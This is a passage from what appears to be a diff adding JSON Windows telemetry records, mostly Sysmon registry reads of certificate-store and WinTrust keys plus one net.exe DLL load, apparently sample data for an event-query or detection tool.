"timestamp": 131883570909810016, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909810016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_value": "Disallowed", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + 
"registry_value": "Software Publishing", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "davclnt.dll", + "image_path": "C:\\Windows\\System32\\davclnt.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910119984, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 